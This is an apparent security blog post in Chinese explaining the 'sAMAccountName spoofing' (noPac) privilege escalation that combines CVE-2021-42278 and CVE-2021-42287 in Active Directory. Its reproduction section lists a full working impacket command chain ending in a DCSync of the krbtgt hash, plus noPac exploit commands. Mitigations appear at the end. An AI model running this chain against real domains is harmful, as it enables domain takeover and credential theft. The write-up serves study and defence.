<!DOCTYPE html>
<html lang="zh-cn">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="robots" content="noodp" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
        <title>sAMAccountName spoofing - Geekby&#39;s Blog</title><meta name="Description" content="sAMAccountName spoofing"><meta property="og:title" content="sAMAccountName spoofing" />
<meta property="og:description" content="sAMAccountName spoofing" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://www.geekby.site/2021/12/samaccountname-spoofing/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2021-12-12T16:31:00+08:00" />
<meta property="article:modified_time" content="2021-12-12T16:31:00+08:00" />

<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="sAMAccountName spoofing"/>
<meta name="twitter:description" content="sAMAccountName spoofing"/>
<meta name="application-name" content="Geekby&#39;s Blog">
<meta name="apple-mobile-web-app-title" content="Geekby&#39;s Blog"><link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" />
        <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
        <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png"><link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"><link rel="manifest" href="/site.webmanifest"><link rel="canonical" href="https://www.geekby.site/2021/12/samaccountname-spoofing/" /><link rel="prev" href="https://www.geekby.site/2021/11/k8s%E5%AE%89%E5%85%A8/" /><link rel="next" href="https://www.geekby.site/2022/02/java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E8%83%8C%E6%99%AF/" /><link rel="stylesheet" href="/lib/normalize/normalize.min.css"><link rel="stylesheet" href="/css/style.min.css"><link rel="stylesheet" href="/lib/fontawesome-free/all.min.css"><link rel="stylesheet" href="/lib/animate/animate.min.css"><script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "BlogPosting",
        "headline": "sAMAccountName spoofing",
        "inLanguage": "zh-cn",
        "mainEntityOfPage": {
            "@type": "WebPage",
            "@id": "https:\/\/www.geekby.site\/2021\/12\/samaccountname-spoofing\/"
        },"image": ["https:\/\/www.geekby.site\/logo.png"],"genre": "posts","keywords": "域安全, 内网渗透","wordcount":  381 ,
        "url": "https:\/\/www.geekby.site\/2021\/12\/samaccountname-spoofing\/","datePublished": "2021-12-12T16:31:00+08:00","dateModified": "2021-12-12T16:31:00+08:00","publisher": {
            "@type": "Organization",
            "name": "Geekby","logo": {
                    "@type": "ImageObject",
                    "url": "https:\/\/www.geekby.site\/images\/avatar.png",
                    "width":  358 ,
                    "height":  330 
                }},"author": {
                "@type": "Person",
                "name": "Geekby"
            },"description": "sAMAccountName spoofing"
    }
    </script></head>
    <body header-desktop="" header-mobile=""><script type="text/javascript">(window.localStorage && localStorage.getItem('theme') ? localStorage.getItem('theme') === 'dark' : ('auto' === 'auto' ? window.matchMedia('(prefers-color-scheme: dark)').matches : 'auto' === 'dark')) && document.body.setAttribute('theme', 'dark');</script>

        <div id="mask"></div><div class="wrapper"><header class="desktop" id="header-desktop">
    <div class="header-wrapper">
        <div class="header-title">
            <a href="/" title="Geekby&#39;s Blog">Geekby&#39;s Blog</a>
        </div>
        <div class="menu">
            <div class="menu-inner"><a class="menu-item" href="/posts/" title="文章"><i class="fas fa-inbox"></i> 文章 </a><a class="menu-item" href="/tags/" title="标签"><i class="fas fa-tags"></i> 标签 </a><a class="menu-item" href="/categories/" title="分类"><i class="fas fa-sort-amount-up-alt"></i> 分类 </a><a class="menu-item" href="/about/" title="关于"><i class="far fa-address-card"></i> 关于 </a><span class="menu-item delimiter"></span><span class="menu-item search" id="search-desktop">
                        <input type="text" placeholder="输入关键字" id="search-input-desktop">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-desktop" title="搜索">
                            <i class="fas fa-search fa-fw"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-desktop" title="清空">
                            <i class="fas fa-times-circle fa-fw"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-desktop">
                            <i class="fas fa-spinner fa-fw fa-spin"></i>
                        </span>
                    </span><a href="javascript:void(0);" class="menu-item theme-switch" title="切换主题">
                    <i class="fas fa-adjust fa-fw"></i>
                </a>
            </div>
        </div>
    </div>
</header><header class="mobile" id="header-mobile">
    <div class="header-container">
        <div class="header-wrapper">
            <div class="header-title">
                <a href="/" title="Geekby&#39;s Blog">Geekby&#39;s Blog</a>
            </div>
            <div class="menu-toggle" id="menu-toggle-mobile">
                <span></span><span></span><span></span>
            </div>
        </div>
        <div class="menu" id="menu-mobile"><div class="search-wrapper">
                    <div class="search mobile" id="search-mobile">
                        <input type="text" placeholder="输入关键字" id="search-input-mobile">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-mobile" title="搜索">
                            <i class="fas fa-search fa-fw"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-mobile" title="清空">
                            <i class="fas fa-times-circle fa-fw"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-mobile">
                            <i class="fas fa-spinner fa-fw fa-spin"></i>
                        </span>
                    </div>
                    <a href="javascript:void(0);" class="search-cancel" id="search-cancel-mobile">
                        取消
                    </a>
                </div><a class="menu-item" href="/posts/" title="文章"><i class="fas fa-inbox"></i>文章</a><a class="menu-item" href="/tags/" title="标签"><i class="fas fa-tags"></i>标签</a><a class="menu-item" href="/categories/" title="分类"><i class="fas fa-sort-amount-up-alt"></i>分类</a><a class="menu-item" href="/about/" title="关于"><i class="far fa-address-card"></i>关于</a><a href="javascript:void(0);" class="menu-item theme-switch" title="切换主题">
                <i class="fas fa-adjust fa-fw"></i>
            </a></div>
    </div>
</header>
<div class="search-dropdown desktop">
    <div id="search-dropdown-desktop"></div>
</div>
<div class="search-dropdown mobile">
    <div id="search-dropdown-mobile"></div>
</div>
<main class="main">
                <div class="container"><div class="toc" id="toc-auto">
            <h2 class="toc-title">目录</h2>
            <div class="toc-content" id="toc-content-auto"></div>
        </div><article class="page single"><h1 class="single-title animated flipInX">sAMAccountName spoofing</h1><div class="post-meta">
            <div class="post-meta-line"><span class="post-author"><a href="/" title="Author" rel=" author" class="author"><i class="fas fa-user-circle fa-fw"></i>Geekby</a></span>&nbsp;<span class="post-category">收录于 <a href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/"><i class="far fa-folder fa-fw"></i>内网渗透</a></span></div>
            <div class="post-meta-line"><i class="far fa-calendar-alt fa-fw"></i>&nbsp;<time datetime="2021-12-12">2021-12-12</time>&nbsp;<i class="fas fa-pencil-alt fa-fw"></i>&nbsp;约 381 字&nbsp;
                <i class="far fa-clock fa-fw"></i>&nbsp;预计阅读 2 分钟&nbsp;</div>
        </div><div class="details toc" id="toc-static"  kept="">
                <div class="details-summary toc-title">
                    <span>目录</span>
                    <span><i class="details-icon fas fa-angle-right"></i></span>
                </div>
                <div class="details-content toc-content" id="toc-content-static"><nav id="TableOfContents">
  <ul>
    <li><a href="#1-背景">1 背景</a>
      <ul>
        <li><a href="#11-cve-2021-42278">1.1 CVE-2021-42278</a></li>
        <li><a href="#12-cve-2021-42287">1.2 CVE-2021-42287</a></li>
        <li><a href="#13-samaccountname">1.3 sAMAccountName</a></li>
        <li><a href="#14-sam-account-type">1.4 SAM-Account-Type</a></li>
      </ul>
    </li>
    <li><a href="#2-漏洞复现">2 漏洞复现</a></li>
    <li><a href="#3-缓解措施">3 缓解措施</a></li>
    <li><a href="#参考">参考</a></li>
  </ul>
</nav></div>
            </div><div class="content" id="content"><h1 id="sam-accountname-spoofing">SAM-AccountName spoofing</h1>
<h2 id="1-背景">1 背景</h2>
<blockquote>
<p>2021 年 11 月，有两个漏洞 CVE-2021-42278 &amp; CVE-2021-42287 被露，两个漏洞组合可导致域内普通用户权限提升至域管权限。</p>
</blockquote>
<h3 id="11-cve-2021-42278">1.1 CVE-2021-42278</h3>
<p><code>windows</code> 域内的机器账户的名字以 <code>$</code> 结尾，但 DC 没有对域内机器账户名做验证。与 CVE-2021-42287 结合使用，它允许攻击者冒充域控制器账户。</p>
<h3 id="12-cve-2021-42287">1.2 CVE-2021-42287</h3>
<p>在 kerberos 认证过程中，用户要访问某个服务，在获取服务票据 ST 之前，需要申请 TGT票据。该漏洞的核心为：当请求的服务票 ST 没有被 KDC 找到时，KDC 会自动在尾部添加 <code>$</code> 重新搜索。</p>
<p>如果 A 用户获得申请了 TGT，然后删除 A 用户或重命名 A 用户。并使用该 TGT 进行 <code>S4U2self</code> 以其它用户身份请求一张 ST 给他自己，导致 KDC 在 Account Database 中寻找 <code>A$</code>。如果帐户 <code>A$</code> 存在，那么 <code>A</code> 就会像其他用户一样为 <code>A$</code>获得一张服务票据。</p>
<p>因此，机器账户改名为和 DC 机器账户一样，然后申请 TGT，接着把用户名修改掉，使得 DC 在 <code>TGS_REP</code> 时候找不到该账户，这时会用自己的密钥加密服务票据 ST，然后就是得到了一个高权限 ST。</p>
<h3 id="13-samaccountname">1.3 sAMAccountName</h3>
<p>根据微软<a href="https://docs.microsoft.com/zh-cn/windows/win32/adschema/a-samaccountname?redirectedfrom=MSDN" target="_blank" rel="noopener noreffer">官方文档</a>中的定义：</p>
<blockquote>
<p>SAM-Account-Name 用于支持运行早期版本操作系统的客户端和服务器的登录名，例如 Windows NT 4.0、Windows 95、Windows 98 和 LAN Manager。实际上是以「Domain\LogonName 」形式命名。</p>
</blockquote>
<p>其 Ldap-Display-Name 为：sAMAccountName。故该组合漏洞又被称为：<code>sAMAccountName spoofing</code></p>
<p>此处还有一种用户命名属性，是目前域环境中常用的一种：<code>UPN</code></p>
<blockquote>
<p><strong>userPrincipalName</strong> 属性是用户的登录名。 属性由 UPN (用户主体) ，这是用户最常见的登录 Windows 名称。 用户通常使用其 UPN 登录到域。</p>
<p>UPN 由 UPN 前缀（用户帐户名）和 UPN 后缀（DNS 域名）组成。 前缀与后缀以 <code>@</code> 符号相联接。UPN 必须在目录林中的所有安全主体对象之间保持唯一。 这意味着可以重复使用 UPN 的前缀，只是不能使用相同的后缀。</p>
</blockquote>
<p>例如：</p>
<ul>
<li>域名：<code>pentest.lab</code></li>
<li>SAM-Account-Name：<code>win11user</code></li>
<li>NetBIOS 登录名：<code>pentest.lab\win11user</code></li>
<li>UserPrincipalName：<code>win11user@pentest.lab</code></li>
</ul>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112171553067.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112171553067.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112171553067.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112171553067.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112171553067.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112171553067.png-water_print" /></p>
<h3 id="14-sam-account-type">1.4 SAM-Account-Type</h3>
<blockquote>
<p><a href="https://docs.microsoft.com/zh-cn/windows/win32/adschema/a-samaccounttype" target="_blank" rel="noopener noreffer">SAM-Account-Type</a> 包含了域内帐户类型对象的信息。可以枚举帐户类型的列表，也可以使用显示信息 API 来创建列表。由于计算机、普通用户帐户和信任帐户还可以枚举为用户对象。</p>
</blockquote>
<h2 id="2-漏洞复现">2 漏洞复现</h2>
<blockquote>
<p>前提：需要对属性 <code>sAMAccountName</code> 和  <code>servicePrincipalName</code> 具有写权限。由于默认情况下 <a href="https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota" target="_blank" rel="noopener noreffer">MAQ</a> 特性，域内普通用户可以创建 10 个机器账户，而创建者对于机器账户具有写权限，当然可以更改这两个属性。</p>
</blockquote>
<ul>
<li>首先创建一个机器账户，使用 impacket 的 <code>addcomputer.py</code> 或是 <code>powermad</code></li>
</ul>
<div class="details admonition tip open">
        <div class="details-summary admonition-title">
            <i class="icon fas fa-lightbulb fa-fw"></i>技巧<i class="details-icon fas fa-angle-right fa-fw"></i>
        </div>
        <div class="details-content">
            <div class="admonition-content"><code>addcomputer.py </code>是利用 <code>SAMR协议</code> 创建机器账户，这个方法所创建的机器账户没有 SPN，所以可以不用清除。</div>
        </div>
    </div>
<ul>
<li>然后清除机器账户的 <code>servicePrincipalName</code> 属性</li>
<li>将机器账户的 <code>sAMAccountName</code>，更改为 DC 的机器账户名字，注意后缀不带 <code>$</code></li>
<li>为机器账户请求 TGT</li>
<li>将机器账户的 <code>sAMAccountName</code> 更改为其他名字，不与步骤 3 重复即可</li>
<li>通过 S4U2self 协议向 DC 请求 ST</li>
<li>DCsync</li>
</ul>
<p>步骤如下：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># 0. create a computer account</span>
</span></span><span class="line"><span class="cl">addcomputer.py -computer-name <span class="s1">&#39;ControlledComputer$&#39;</span> -computer-pass <span class="s1">&#39;ComputerPassword&#39;</span> -dc-host DC01 -domain-netbios domain <span class="s1">&#39;domain.local/user1:complexpassword&#39;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 1. clear its SPNs</span>
</span></span><span class="line"><span class="cl">addspn.py -u <span class="s1">&#39;domain\user&#39;</span> -p <span class="s1">&#39;password&#39;</span> -t <span class="s1">&#39;ControlledComputer$&#39;</span> -c DomainController
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 2. rename the computer (computer -&gt; DC)</span>
</span></span><span class="line"><span class="cl">renameMachine.py -current-name <span class="s1">&#39;ControlledComputer$&#39;</span> -new-name <span class="s1">&#39;DomainController&#39;</span> -dc-ip <span class="s1">&#39;DomainController.domain.local&#39;</span> <span class="s1">&#39;domain.local&#39;</span>/<span class="s1">&#39;user&#39;</span>:<span class="s1">&#39;password&#39;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 3. obtain a TGT</span>
</span></span><span class="line"><span class="cl">getTGT.py -dc-ip <span class="s1">&#39;DomainController.domain.local&#39;</span> <span class="s1">&#39;domain.local&#39;</span>/<span class="s1">&#39;DomainController&#39;</span>:<span class="s1">&#39;ComputerPassword&#39;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 4. reset the computer name</span>
</span></span><span class="line"><span class="cl">renameMachine.py -current-name <span class="s1">&#39;DomainController&#39;</span> -new-name <span class="s1">&#39;ControlledComputer$&#39;</span> <span class="s1">&#39;domain.local&#39;</span>/<span class="s1">&#39;user&#39;</span>:<span class="s1">&#39;password&#39;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 5. obtain a service ticket with S4U2self by presenting the previous TGT</span>
</span></span><span class="line"><span class="cl"><span class="nv">KRB5CCNAME</span><span class="o">=</span><span class="s1">&#39;DomainController.ccache&#39;</span> getST.py -self -impersonate <span class="s1">&#39;DomainAdmin&#39;</span> -spn <span class="s1">&#39;cifs/DomainController.domain.local&#39;</span> -k -no-pass -dc-ip <span class="s1">&#39;DomainController.domain.local&#39;</span> <span class="s1">&#39;domain.local&#39;</span>/<span class="s1">&#39;DomainController&#39;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 6. DCSync by presenting the service ticket</span>
</span></span><span class="line"><span class="cl"><span class="nv">KRB5CCNAME</span><span class="o">=</span><span class="s1">&#39;DomainAdmin.ccache&#39;</span> secretsdump.py -just-dc-user <span class="s1">&#39;krbtgt&#39;</span> -k -no-pass -dc-ip <span class="s1">&#39;DomainController.domain.local&#39;</span> @<span class="s1">&#39;DomainController.domain.local&#39;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>武器化工具地址：<a href="https://github.com/cube0x0/noPac" target="_blank" rel="noopener noreffer">https://github.com/cube0x0/noPac</a></p>
<p>扫描：<code>noPac.exe scan -domain pentest.lab -user win11user -pass P@ssword</code></p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122016658.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122016658.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122016658.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122016658.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122016658.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122016658.png-water_print" /></p>
<p>利用：</p>
<p><code>noPac.exe scan -domain pentest.lab -user win11user -pass P@ssword /dc dc.pentest. lab /mAccount demol /mPassword pAss123! /service cifs /ptt</code></p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122016522.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122016522.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122016522.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122016522.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122016522.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122016522.png-water_print" /></p>
<p>查看内存中的票据，发现已经存在 dc 的 cifs 服务票据：</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122017939.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122017939.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122017939.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122017939.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122017939.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122017939.png-water_print" /></p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122017582.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122017582.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122017582.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122017582.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122017582.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122017582.png-water_print" /></p>
<p>Dcsync：</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122018112.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122018112.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122018112.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122018112.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122018112.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112122018112.png-water_print" /></p>
<h2 id="3-缓解措施">3 缓解措施</h2>
<ol>
<li>微软官方已推出补丁：KB5008602、KB5008380</li>
<li>通过域控的 ADSI 编辑器工具将 AD 域的 MAQ 配置为 0，中断此漏洞的利用链（但如果当前用户对域内某台机器账号拥有 <code>GenericALL</code>、<code>GenericWrite</code>、<code>WriteProperty</code> 权限仍能修改 SAMAccountName 属性），具体查询方式如下：</li>
</ol>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="line"><span class="cl"><span class="c"># 列出所有机器账号</span>
</span></span><span class="line"><span class="cl"><span class="nb">Get-ADComputer</span> <span class="n">-Filter</span> <span class="p">*</span> <span class="n">-Property</span> <span class="p">*</span> <span class="p">|</span> <span class="nb">Format-Table</span> <span class="n">Name</span><span class="p">,</span><span class="n">OperatingSystem</span><span class="p">,</span><span class="n">OperatingSystemServicePack</span><span class="p">,</span><span class="n">OperatingSystemVersion</span> <span class="n">-Wrap</span> <span class="n">-Auto</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c"># 权限查询</span>
</span></span><span class="line"><span class="cl"><span class="nb">Get-DomainObjectAcl</span> <span class="n">ControlledComputer</span> <span class="n">-ResolveGUIDs</span> <span class="p">|?{</span><span class="nv">$_</span><span class="p">.</span><span class="n">securityidentifier</span> <span class="o">-eq</span> <span class="p">(</span><span class="nb">get-domainuser</span> <span class="n">win11user</span><span class="p">).</span><span class="n">objectsid</span><span class="p">}</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112171648030.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112171648030.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112171648030.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112171648030.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112171648030.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112171648030.png-water_print" /></p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112171648542.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112171648542.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112171648542.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112171648542.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112171648542.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202112171648542.png-water_print" /></p>
<h2 id="参考">参考</h2>
<ul>
<li><a href="https://tttang.com/archive/1380/" target="_blank" rel="noopener noreffer">https://tttang.com/archive/1380/</a></li>
<li><a href="https://mp.weixin.qq.com/s/Ar8u_gXh2i3GEcqdhOD8wA" target="_blank" rel="noopener noreffer">https://mp.weixin.qq.com/s/Ar8u_gXh2i3GEcqdhOD8wA</a></li>
</ul>
</div><div class="post-footer" id="post-footer">
    <div class="post-info">
        <div class="post-info-line">
            <div class="post-info-mod">
                <span>更新于 2021-12-12</span>
            </div>
            <div class="post-info-license"></div>
        </div>
        <div class="post-info-line">
            <div class="post-info-md"></div>
            <div class="post-info-share">
                <span><a href="javascript:void(0);" title="分享到 微博" data-sharer="weibo" data-url="https://www.geekby.site/2021/12/samaccountname-spoofing/" data-title="sAMAccountName spoofing"><i class="fab fa-weibo fa-fw"></i></a><a href="javascript:void(0);" title="分享到 Evernote" data-sharer="evernote" data-url="https://www.geekby.site/2021/12/samaccountname-spoofing/" data-title="sAMAccountName spoofing"><i class="fab fa-evernote fa-fw"></i></a><a href="javascript:void(0);" title="分享到 Skype" data-sharer="skype" data-url="https://www.geekby.site/2021/12/samaccountname-spoofing/" data-title="sAMAccountName spoofing"><i class="fab fa-skype fa-fw"></i></a></span>
            </div>
        </div>
    </div>

    <div class="post-info-more">
        <section class="post-tags"><i class="fas fa-tags fa-fw"></i>&nbsp;<a href="/tags/%E5%9F%9F%E5%AE%89%E5%85%A8/">域安全</a>,&nbsp;<a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a></section>
        <section>
            <span><a href="javascript:void(0);" onclick="window.history.back();">返回</a></span>&nbsp;|&nbsp;<span><a href="/">主页</a></span>
        </section>
    </div>

    <div class="post-nav"><a href="/2021/11/k8s%E5%AE%89%E5%85%A8/" class="prev" rel="prev" title="K8s 安全"><i class="fas fa-angle-left fa-fw"></i>K8s 安全</a>
            <a href="/2022/02/java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E8%83%8C%E6%99%AF/" class="next" rel="next" title="Java 代码审计 - 背景">Java 代码审计 - 背景<i class="fas fa-angle-right fa-fw"></i></a></div>
</div>
</article></div>
            </main><footer class="footer">
        <div class="footer-container"><div class="footer-line"><i class="far fa-copyright fa-fw"></i><span itemprop="copyrightYear">2019 - 2022</span><span class="author" itemprop="copyrightHolder">&nbsp;<a href="/" target="_blank">Geekby</a></span>&nbsp;|&nbsp;<span class="license"><a rel="license external nofollow noopener noreffer" href="https://creativecommons.org/licenses/by-nc/4.0/" target="_blank">CC BY-NC 4.0</a></span></div>
        </div>
    </footer></div>

        <div id="fixed-buttons"><a href="#" id="back-to-top" class="fixed-button" title="回到顶部">
                <i class="fas fa-arrow-up fa-fw"></i>
            </a><a href="#" id="view-comments" class="fixed-button" title="查看评论">
                <i class="fas fa-comment fa-fw"></i>
            </a>
        </div><link rel="stylesheet" href="/lib/lightgallery/lightgallery.min.css"><script type="text/javascript" src="/lib/smooth-scroll/smooth-scroll.min.js"></script><script type="text/javascript" src="/lib/autocomplete/autocomplete.min.js"></script><script type="text/javascript" src="/lib/algoliasearch/algoliasearch-lite.umd.min.js"></script><script type="text/javascript" src="/lib/lazysizes/lazysizes.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lightgallery.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lg-thumbnail.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lg-zoom.min.js"></script><script type="text/javascript" src="/lib/clipboard/clipboard.min.js"></script><script type="text/javascript" src="/lib/sharer/sharer.min.js"></script><script type="text/javascript">window.config={"code":{"copyTitle":"复制到剪贴板","maxShownLines":100},"comment":{},"lightGallery":{"actualSize":false,"exThumbImage":"data-thumbnail","hideBarsDelay":2000,"selector":".lightgallery","speed":400,"thumbContHeight":80,"thumbWidth":80,"thumbnail":true},"search":{"algoliaAppID":"C19A58DMI2","algoliaIndex":"blog","algoliaSearchKey":"a7203b4397475a3fcf49cea4495e0987","highlightTag":"em","maxResultLength":10,"noResultsFound":"没有找到结果","snippetLength":50,"type":"algolia"}};</script><script type="text/javascript" src="/js/theme.min.js"></script></body>
</html>
